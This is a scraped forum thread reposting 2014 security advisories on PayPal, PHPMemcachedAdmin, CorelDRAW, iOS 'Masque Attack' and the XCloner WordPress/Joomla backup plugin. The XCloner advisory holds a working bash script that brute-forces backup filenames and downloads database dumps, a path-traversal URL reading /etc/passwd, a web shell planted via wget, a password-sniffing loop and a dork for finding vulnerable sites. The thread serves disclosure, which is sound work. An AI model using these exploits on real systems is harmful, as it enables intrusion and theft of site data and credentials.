api. The vulnerable accountselname confidential and confidential values needs to be encoded even if transfered through andother service location. Restrict the input for registration and disallow specialchars to prevent script code injects and code execution payloads with unauthorized file requests through the trusted paypal home webapps context. Note: The issue should be checked by the dev team to review also the backend effect of the issues. Issue is already marked as patched 2014Q4. Security Risk: ============== The security risk of the of the arbitrary code execution in the confidential account value GET method request is estimated as critical. (CVSS 9.1) Attacker can request local path values by implementation of privileged context reuqest in the referer which results in a system compromise because of attackers are able to access unauthorized server local files. Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com) Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2014 | Vulnerability Laboratory - Evolution Security GmbH ™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com COMPANY: Evolution Security GmbH BUSINESS: www.evolution-sec.com Surs?: PayPal Arbitrary Code Execution ? Packet Storm http://magazine.vulnerability-db.com/?q=articles/2014/11/05/paypal-inc-fixed-filter-bypass-profile-code-execution-during-infrastructure
  21. CVE-2014-8731 CVSSv2 Vector: [AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:U/RC:C] CVSSv2 Base Score=10.0 CVSSv2 Temp Score=9.5 OWASP Top 10 classification: A1 - Injection PHPMemcachedAdmin is a web-based frontend for Linux's memcached Daemon. Project Homepage: https://code.google.com/p/phpmemcacheadmin/ Download Site: http://blog.elijaa.org/index.php?pages/phpMemcachedAdmin-Download PHPMemcachedAdmin stores data in the server's filesystem. Part of the serialized data and the last part of the concatenated filename may be specified by the user, which can lead to remote code execution e.g. if a php script is created and placed within the webserver's document root. All versions prior and including the current version 1.2.2 are affected as far as we know. Surs?: PHPMemcachedAdmin 1.2.2 Remote Code Execution ? Packet Storm
  22. CorelDRAW X7 CDR File (CdrTxt.dll) Off-By-One Stack Corruption Vulnerability Vendor: Corel Corporation Product web page: http://www.corel.com Affected version: 17.1.0.572 (X7) - 32bit/64bit (EN) 15.0.0.486 (X5) - 32bit (EN) Summary: CorelDRAW is one of the image-creating programs in a suite of graphic arts software used by professional artists, educators, students, businesses and the general public. The CorelDRAW Graphics Suite X7, which includes CorelDRAW, is sold as stand-alone software and as a cloud-based subscription. CorelDRAW is the core of the graphics suite and is primarily used for vector illustrations and page layouts. Desc: CorelDRAW is prone to an off-by-one memory corruption vulnerability. An attacker can exploit this issue by tricking a victim into opening a malicious CDR file to execute arbitrary code and/or to cause denial-of-service conditions. --- eax=13921178 ebx=00000003 ecx=00000000 edx=138fa270 esi=13c41e78 edi=00000002 eip=5fea43e4 esp=001eca8c ebp=131f67b8 iopl=0 nv up ei ng nz ac pe cy cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210297 CdrTxt!WStyleList::EndLoad+0x74: 5fea43e4 8b01 mov eax,dword ptr [ecx] ds:002b:00000000=???????? --- Tested on: Microsoft Windows 7 Professional SP1 (EN) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2014-5204 Advisory URL: [url]http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5204.php[/url] 27.10.2014 --- PoC: - [url]http://www.zeroscience.mk/codes/zsl_5204.rar[/url] - [url]http://www.exploit-db.com/sploits/35217.rar[/url] Surs?: http://www.exploit-db.com/exploits/35217/
  23. Android have been a long time target for cyber criminals, but now it seems that they have turned their way towards iOS devices. Apple always says that hacking their devices is too difficult for cyber crooks, but a single app has made it possible for anyone to hack an iPhone. A security flaw in Apple's mobile iOS operating system has made most iPhones and iPads vulnerable to cyber attacks by hackers seeking access to sensitive data and control of their devices, security researchers warned. The details about this new vulnerability was published by the Cyber security firm FireEye on its blog on Monday, saying the flaw allows hackers to access devices by fooling users to download and install malicious iOS applications on their iPhone or iPad via tainted text messages, emails and Web links. MASQUE ATTACK - REPLACING TRUSTED APPS The malicious iOS apps can then be used to replace the legitimate apps, such as banking or social networking apps, that were installed through Apple's official App Store through a technique that FireEye has dubbed "Masque Attack." Masque attacks can be used by cyber criminals to steal banking and email login credentials or users’ other sensitive information. Security researchers found that the Masque attack works on Apple’s mobile operating system including iOS 7.1.1, 7.1.2, 8.0, 8.1, and the 8.1.1 beta version and that all of the iPhones and iPads running iOS 7 or later, regardless of whether or not the device is jailbroken are at risk. According to FireEye, the vast majority, i.e. 95 percent, of all iOS devices currently in use are potentially vulnerable to the attack. MASQUE ATTACK IS MORE DANGEROUS THAN WIRELURKER The Masque Attack technique is the same used by "WireLurker," malware attack discovered last week by security firm Palo Alto Networks targeting Apple users in China, that allowed unapproved apps designed to steal information downloaded from the Internet. But this recently-discovered malware threat is reportedly a "much bigger threat" than Wirelurker. HOW TO PROTECT YOURSELF FROM MASQUE ATTACK Apple devices running iOS are long considered more safe from hackers than devices running OS like Microsoft’s Windows and Google’s Android, but iOS have now become more common targets for cybercriminals. In order to avoid falling victim to Masque Attack, users can follow some simple steps given below: Do not download any apps offer to you via email, text messages, or web links. Don't install apps offered on pop-ups from third-party websites. If iOS alerts a user about an "Untrusted App Developer," click "Don't Trust" on the alert and immediately uninstall the application. Surs?: Masque Attack — New iOS Vulnerability Allows Hackers to Replace Apps with Malware
  24. A l?sat o "urm?" @dcristi. Ar fi bine s? o cenzura?i.
  25. Title: XCloner Wordpress/Joomla! backup Plugin v3.1.1 (Wordpress) v3.5.1 (Joomla!) Vulnerabilities Author: Larry W. Cashdollar, @_larry0 Date: 10/17/2014 Download: https://wordpress.org/plugins/xcloner-backup-and-restore/ Download: http://extensions.joomla.org/extensions/access-a-security/site-security/backup/665 Downloads: Wordpress 313,647 Joomla! 515745 StandAlone 69175 Website: http://www.xcloner.com Advisory: http://www.vapid.dhs.org/advisories/wordpress/plugins/Xcloner-v3.1.1/ Vendor: Notified 10/17/14 Ovidiu Liuta, @thinkovi Acknowledged & no other response. CVEID: Requested, TDB. OSVDBID:114176,114177,114178,114179,114180 Description: “XCloner is a Backup and Restore component designed for PHP/Mysql websites, it can work as a native plugin for WordPress and Joomla!.” Vulnerabilities: There are multiple vulnerabilities I’ve discovered in this plugin, they are as follows. 1. Arbitrary command execution. 2. Clear text MySQL password exposure through html text box under configuration panel. 3. Database backups exposed to local users due to open file permissions. 4. Unauthenticated remote access to backup files via easily guessable file names. 5. Authenticated remote file access. 6. MySQL password exposed to process table. Arbitrary Command Execution Plugin allows arbitrary commands to be executed by an authenticated user. The user will require administrative access rights to backup the database. User input when specifying your own file name is not sanitized as well as various other input fields. PoC All input fields I believe are vulnerable, I’ve chosen the backup filename and a wget of sh.txt which is simply <?php passthru($_GET)?> into a writeable directory by www-data. Screenshots available at the advisory URL above. All user configurable variables are vulnerable, these variables need to be sanitized before being passed to the exec() function for execution. $_CONFIG[tarpath] $exclude $_CONFIG['tarcompress'] $_CONFIG['filename'] $_CONFIG['exfile_tar'] $_CONFIG[sqldump] $_CONFIG['mysql_host'] $_CONFIG['mysql_pass'] $_CONFIG['mysql_user'] $database_name $sqlfile $filename Vulnerable code ./cloner.functions.php: 1672 exec($_CONFIG[tarpath] . " $exclude -c" . $_CONFIG['tarcompress'] . "vf $filename ./administrator/backups/index.html"); 1673 exec($_CONFIG[tarpath] . " -" . $_CONFIG['tarcompress'] . "vf $filename --update ./administrator/backups/database-sql.sql"); 1674 exec($_CONFIG[tarpath] . " -" . $_CONFIG['tarcompress'] . "vf $filename --update ./administrator/backups/htaccess.txt"); 1675 exec($_CONFIG[tarpath] . " -" . $_CONFIG['tarcompress'] . "vf $filename --update ./administrator/backups/perm.txt"); 1695- if ($_REQUEST[cron_dbonly] != 1) { 1696: exec($_CONFIG[tarpath] . " $excl_cmd " . " -X " . $_CONFIG['exfile_tar'] . " -chv" . $_CONFIG['tarcompress'] . "f $filename ./"); 1697- } else { 1698- 1699- 1700: exec($_CONFIG[tarpath] . " -" . $_CONFIG['tarcompress'] . "cvf $filename ./administrator/backups/database-sql.sql"); 1701- 1702- if (is_array($databases_incl)) { 1703- foreach ($databases_incl as $database_name) 1704- if ($database_name != "") { 1705: exec($_CONFIG[tarpath] . " -" . $_CONFIG['tarcompress'] . "vf $filename --update ./administrator/backups/" . $database_name . "-sql.sql"); 1706- } 1707- } 1708- } -- 1873- { 1874- //$sizeInBytes = filesize($path); 1875- $sizeInBytes = sprintf("%u", filesize($path)); 1876: if ((!$sizeInBytes) and (function_exists("exec"))){ 1877- $command = "ls -l \"$path\" | cut -d \" \" -f 5"; 1878: $sizeInBytes = @exec($command); 345- } 346- 347- return $sizeInBytes; ./restore/XCloner.php 290- }else{ 291- if($ext == '.tgz') $compress = 'z'; 292- else $compress = ''; 293: shell_exec("tar -x".$compress."pf $file -C $_CONFIG[output_path]"); 294- } 295-} 1077- if($_REQUEST['use_mysqldump'] == 1){ 1078: echo shell_exec($_REQUEST['mysqldump_path']." -u ".$_REQUEST[mysql_username]." -p".$_REQUEST[mysql_pass]." -h ".$_REQUEST[mysql_server]." ".$_REQUEST[mysql_db]." < ".$sqlfile); 1079- return; 1080- } Clear Text MySQL Database Password The plugin also returns the MySQL clear text password via html text box back to the user in the configuration panel. A password should never be repeated back to you in clear text. The plugin will happily send this over a clear text connection. Screenshots available at the advisory URL above. Remote Database Download & Local File Permissions The default recommend path for backup storage is /usr/share/wordpress/administrator/backups. An index.html file is created under this directory to prevent casual browsing however the file names are easily predictable. From the installation instructions: “XCloner is a tool that will help you manage your website backups, generate/restore/move so your website will be always secured! With XCloner you will be able to clone your site to any other location with just a few clicks. Don't forget to create the 'administrator/backups' directory in your Wordpress root and make it fully writeable.” The format of the filenames are: backup_year-month-day_month_24hour_minute_domainname-sql-OPTIONS.tar where OPTIONS could be either -sql-drop, -sql-nodrop or -nosql depending on options selected during time of backup. The domain name is set by the HTTP_HOST header from line 88 of cloner.config.php: 88: $_CONFIG['mosConfig_live_site']=$_SERVER['HTTP_HOST']; root@larry:/usr/share/wordpress/administrator/backups# ls -l total 129432 -rw-r--r-- 1 www-data www-data 44177408 Oct 29 13:15 backup_2014-10-29_10-14_testsite-sql-nodrop.tar -rw-r--r-- 1 www-data www-data 44177408 Oct 29 13:19 backup_2014-10-29_10-19_testsite-sql-nodrop.tar -rw-r--r-- 1 www-data www-data 44177408 Oct 29 13:24 backup_2014-10-29_10-24_testsite-sql-nodrop.tar These file permissions also expose the contents of the databases to any local system users. File naming convention code is as follows: 1327 $domainname = $_CONFIG['mosConfig_live_site']; 1351 if ($_REQUEST['bname'] == "") { 1352 if ($backupDatabase == 1) { 1353 if ($_REQUEST['dbbackup_drop']) { 1354 $filename1 = 'backup_' . date("Y-m-d_H-i") . '_' . $domainname . '-sql-drop' . $f_ext; 1355 } else { 1356 1357 $filename1 = 'backup_' . date("Y-m-d_H-i") . '_' . $domainname . '-sql-nodrop' . $f_ext; 1358 } 1359 } else 1360 $filename1 = 'backup_' . date("Y-m-d_H-i") . '_' . $domainname . '-nosql' . $f_ext; 1361 } else { Screenshots available at the advisory URL above. I’ve found a few vulnerable websites with the google dork: [url]https://www.google.com/#q=inurl:+administrator%2Fbackups[/url] A PoC: lwc@wordpress:~$ bash exp.sh 192.168.0.26 [+] Location [url]http://192.168.0.26/administrator/backups/backup_2014-10-30_06-27_-sql-nodrop.tar[/url] Found [+] Received HTTP/1.1 200 OK Downloading...... --2014-10-30 13:02:51-- [url]http://192.168.0.26/administrator/backups/backup_2014-10-30_06-27_-sql-nodrop.tar[/url] Connecting to 192.168.0.26:80... connected. HTTP request sent, awaiting response... 200 OK Length: 44400640 (42M) [application/x-tar] Saving to: `backup_2014-10-30_06-27_-sql-nodrop.tar.1' 100%[========================================>] 44,400,640 56.9M/s in 0.7s 2014-10-30 13:02:52 (56.9 MB/s) - `backup_2014-10-30_06-27_-sql-nodrop.tar.1' saved [44400640/44400640] [+] Location [url]http://192.168.0.26/administrator/backups/backup_2014-10-30_06-33_-sql-nodrop.tar[/url] Found [+] Received HTTP/1.1 200 OK Downloading...... --2014-10-30 13:02:52-- [url]http://192.168.0.26/administrator/backups/backup_2014-10-30_06-33_-sql-nodrop.tar[/url] Connecting to 192.168.0.26:80... connected. HTTP request sent, awaiting response... 200 OK Length: 44400640 (42M) [application/x-tar] Saving to: `backup_2014-10-30_06-33_-sql-nodrop.tar.1' 100%[========================================>] 44,400,640 64.1M/s in 0.7s 2014-10-30 13:02:53 (64.1 MB/s) - `backup_2014-10-30_06-33_-sql-nodrop.tar.1' saved [44400640/44400640] #!/bin/bash #Exploit to download XCloner v3.1.1 Database backups OSVDB: 114177 #Larry W. Cashdollar, @_larry0 #XCloner recommends a backup storage path under the WP root directory #it uses a 0 size index.html file to block indexing. #we can try to brute force the filenames it creates. MONTH=10 DAY=30 #May need to set the DOMAIN to $1 the target depending on how WP is configured. DOMAIN= for y in `seq -w 1 24`; do for x in `seq -w 1 59`; do CPATH="http://$1/administrator/backups/backup_2014-"$MONTH"-"$DAY"_"$y"-"$x"_$DOMAIN-sql-nodrop.tar"; RESULT=`curl -s --head $CPATH|grep 200`; if [ -n "$RESULT" ]; then echo "[+] Location $CPATH Found"; echo "[+] Received $RESULT"; echo "Downloading......"; wget $CPATH fi; done done Remote File Access The user has to have administrative rights, but the backup downloader doesn’t check the path for ../. [url]http://192.168.0.33/wp-admin/admin-ajax.php?action=json_return&page=xcloner_show&option=com_cloner&task=download&file=../../../../etc/passwd[/url] Will download /etc/passwd off the remote system. MySQL Database Password Exposed to Process Table Local users can steal the MySQL password by watching the process table: lwc@wordpress:/etc/wordpress$ while (true); do ps -ef |grep [m]ysqldump; done www-data 16691 8889 0 09:27 ? 00:00:00 sh -c mysqldump --quote-names -h localhost -u root -pPASSWORDHERE wordpress > /usr/share/wordpress/administrator/backups/database-sql.sql --allow-keywords www-data 16692 16691 0 09:27 ? 00:00:00 mysqldump --quote-names -h localhost -u root -px xxxxxx wordpress --allow-keywords www-data 16691 8889 0 09:27 ? 00:00:00 sh -c mysqldump --quote-names -h localhost -u root -ps3cur1ty wordpress > /usr/share/wordpress/administrator/backups/database-sql.sql --allow-keywords www-data 16692 16691 0 09:27 ? 00:00:00 mysqldump --quote-names -h localhost -u root -px xxxxxx wordpress --allow-keywords ^C Source: Joomla/WordPress XCloner Command Execution / Password Disclosure ? Packet Storm
×
×
  • Create New...